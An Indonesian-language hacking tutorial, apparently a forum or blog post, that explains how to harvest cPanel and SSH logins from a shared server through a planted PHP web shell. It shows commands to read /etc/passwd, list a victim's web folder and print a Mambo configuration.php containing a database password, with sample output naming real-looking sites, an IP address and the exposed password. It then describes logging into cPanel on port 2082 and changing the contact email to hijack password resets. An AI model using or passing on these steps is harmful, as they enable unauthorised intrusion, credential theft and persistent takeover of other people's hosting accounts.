Mencari Login Cpanel login dan SSH ( Inject )

Mungkin ini jadul atau gimana gw juga cuman mau share aja barang kali buat yang pengen cari-cari CPANEL and SSH. ok kita langsung aja dah ke TKP...

Barang yg perlu disiapin nih ...

1. Komputer dgn koneksi internet.
2. Phpshell
3. kesabaran
4. Doa tentunya
5. rokok ma kopi juga jangan lupa

Pertama kita buka phpshell ato target injek kita ...
untuk sebagai contoh akan kasih situs dibawah ini

http://www.abcd.net.au/

Langkah pertama :

cat /etc/passwd <--- guna nya buat tau jumlah user yg ada disana ....

contoh :

lagerhus:32050:32051::/home/lagerhus:/usr/local/cpanel/bin/jailshell
ltngrupp:32051:32052::/home/ltngrupp:/usr/local/cpanel/bin/jailshell
melodin:32054:32055::/home/melodin:/usr/local/cpanel/bin/jailshell
monalisa:32055:32056::/home/monalisa:/usr/local/cpanel/bin/jailshell
sandvika:32056:32057::/home/sandvika:/usr/local/cpanel/bin/jailshell
storvilt:32057:32058::/home/storvilt:/usr/local/cpanel/bin/jailshell
supercup:32058:32059::/home/supercup:/usr/local/cpanel/bin/jailshell

ok....

langkah kedua ....
pilih salah satu user ...

contoh :
/home/monalisa <-- aku pilih ini ...
dan masuk ke folder public_html ...

/home/monalisa/public_html

langkah ke tiga coba kalian ls -al dan perhatikan saut2 nama file itu

contoh:
ls -al dari /home/monalisa/public_html

344337 drwxr-x--- 27 monalisa nobody 4096 Aug 29 09:31 .
5718289 drwx--x--x 11 monalisa monalisa 4096 Aug 29 09:53 ..
344348 -rw-r--r-- 1 monalisa monalisa 690 May 11 02:14 .htaccess
344088 -rwxr-xr-x 1 monalisa monalisa 56216 Feb 26 2006 CHANGELOG.php
344354 -rwxr-xr-x 1 monalisa monalisa 3429 Feb 26 2006 COPYRIGHT.php
344351 -rwxrwxrwx 1 monalisa monalisa 1122 Jul 20 18:18 INSTALL.php
344342 -rwxrwxrwx 1 monalisa monalisa 17977 Sep 17 2005 LICENSE.php
10240263 drwxrwxrwx 9 monalisa monalisa 4096 Dec 15 2005 administrator
4194486 drwxrwxrwx 16 monalisa monalisa 4096 Feb 22 2006 bancorotto
8176127 drwxr-xr-x 9 monalisa monalisa 4096 Mar 24 14:00 bilder
9846992 drwxrwxrwx 2 monalisa monalisa 4096 Dec 21 2005 bilder_old
4194627 drwxrwxrwx 16 monalisa monalisa 4096 Feb 22 2006 byrakrat
32993 drwxrwxrwx 2 monalisa monalisa 4096 May 30 13:04 cache
4194623 drwxrwxrwx 16 monalisa monalisa 4096 Feb 22 2006 cafebeirut
5095694 drwxrwxrwx 2 monalisa monalisa 4096 Oct 1 2005 cgi-bin
180461 drwxrwxrwx 25 monalisa monalisa 4096 May 31 12:00 components
344140 -rwxr-xr-x 1 monalisa monalisa 2852 Jul 25 12:06 configuration.php
344141 -rwxr-xr-x 1 root root 2855 Jul 17 17:52 configuration.php~
4194484 drwxrwxrwx 16 monalisa monalisa 4096 Aug 22 15:18 davinci

dari sini kita bisa liat bahwa user monalisa menggunakan mambo (yang laen) ...

langkah ke empat yaitu baca file yg bernama configuration.php ato config.php ato db.php
contoh:
dalam kasus ini file yg ada adalah configuration.php
jadi kita cat configuration.php
hasilnya :

$mosConfig_live_site = ´http://www.monalisahuset.no´;
$mosConfig_locale = ´no_NO´;
$mosConfig_mailer = ´mail´;
$mosConfig_mailfrom = ´post@monalisahuset.no´;
$mosConfig_ml_support = ´0´;
$mosConfig_multipage_toc = ´1´;
$mosConfig_offline = ´0´;
$mosConfig_offline_message = ´This site is down for maintenance.
Please check back again soon.´;
$mosConfig_offset = ´-2´;
$mosConfig_offset_user = ´0´;
$mosConfig_pagetitles = ´1´;
$mosConfig_password = ´jqUf#(l´;

ok dari sini kita bisa mendapat pass dari user tersebut
pass na adalah $mosConfig_password = ´jqUf#(l´;

langkah ke lima mengetahui bagaimana cara utk login ke dalam cpanel ato ssh ...
setelah kita mendapat kan passwordnya kita coba utk login ke cpanel nya dengan cara caranya ketik /dns di Mirc

contoh:

[15:02] * Dns resolving www.abcd.net.au
[15:02] * Dns resolved www.abcd.net.au to 62.70.54.76

dari situ kita mendapat kan ip server 62.70.54.76
utk login cpanel kita bisa menggunakan http://:2082 dalam hal ini http://62.70.54.76:2082

setelah itu kita masukan username dan pass ....
utk username kita dapat dari cat /etc/passwd dan dalam kasus ini user yg kita pake adalah monalisa, jadi utk login kita masukan adalah
username : monalisa
password : jqUf#(l

dan anda tlah masuk kedalam cpanel nya ...


Note:
1. Tidak smua user mempunyai cpanel ato ssh ... ini dapat kita lihat dari cat /etc/passwd tandanya : /usr/local/cpanel/bin/jailshell <--- berarti user ini memiliki cpanel dan shell tapi jika : /bin/false <-- tandanya cpanel nya dia tidak punya ato shellna.

2. Beberapa server sudah mulai pintar menyembunyikan pass mreka ... salah satu trik utk medapat kan pass mereka coba kalian baca index.php ato admin.php disana akan di cantumkan letak dimana user name dan password nya di sembunyikan.

3. satu saran dari saya setelah kmu masuk ke cpanel jgn merubah password mereka tapi rubah aja contact information masukan email kalian disana dan klo pass udah dirubah tinggal reset password dan pass na akan kekirim ke email kalian

mungkin itu aja yang bisa gw share, maaf jika ada yang salah atau marah karena udah tahu, ini cuman pembelajaran aja, maaf sebelumnya....